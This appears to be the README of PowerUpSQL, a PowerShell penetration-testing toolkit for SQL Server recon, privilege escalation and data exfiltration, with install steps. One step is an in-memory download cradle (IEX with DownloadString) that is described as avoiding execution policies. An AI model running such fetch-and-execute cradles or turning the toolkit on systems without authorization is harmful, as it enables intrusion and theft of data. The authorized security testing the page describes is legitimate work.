PowerUpSQL: A PowerShell Toolkit for Attacking SQL Server
The PowerUpSQL module includes functions that support SQL Server discovery, auditing for common weak configurations, and privilege escalation on the scale. It is intended to be used during internal penetration tests and red team engagements. However, PowerUpSQL also includes many functions that could be used by administrators to quickly inventory the SQL Servers in their ADS domain.
Below is a list of PowerUpSQL function categories. The categories are loosely mapped to common SQL Server attack workflows. Each page contains a list of the associated functions that can be used during testing.
- Active Directory Recon
- Password Recovery
- Data Exfiltration
- Third Party
- add redbeam default credentials to get-sqlserverlogindefaultpw
git clone https://github.com/NetSPI/PowerUpSQL.git
Setting Up PowerUpSQL
- Option 1: Install it from the PowerShell Gallery. This requires local administrative privileges and will permanently install the module.
Install-Module -Name PowerUpSQL
- Option 2: Download the project and import it. This does not require administrative privileges and will only be imported into the current session. However, it may be blocked by restrictive execution policies.
- Option 3: Load it into a session via a downloading cradle. This does not require administrative privileges and will only be imported into the current session. It should not be blocked by executions policies.IEX(New-Object System.Net.WebClient).DownloadString(“https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1”) Note: To run as an alternative domain user, use the run as command to launch PowerShell first.runas /noprofile /netonly /user:domain\user PowerShell.exe
Getting Command Help
- To list functions from the module, type: Get-Command -Module PowerUpSQL
- To list help for a function, type: Get-Help FunctionName
Copyright (c) 2018, NetSPI
All rights reserved.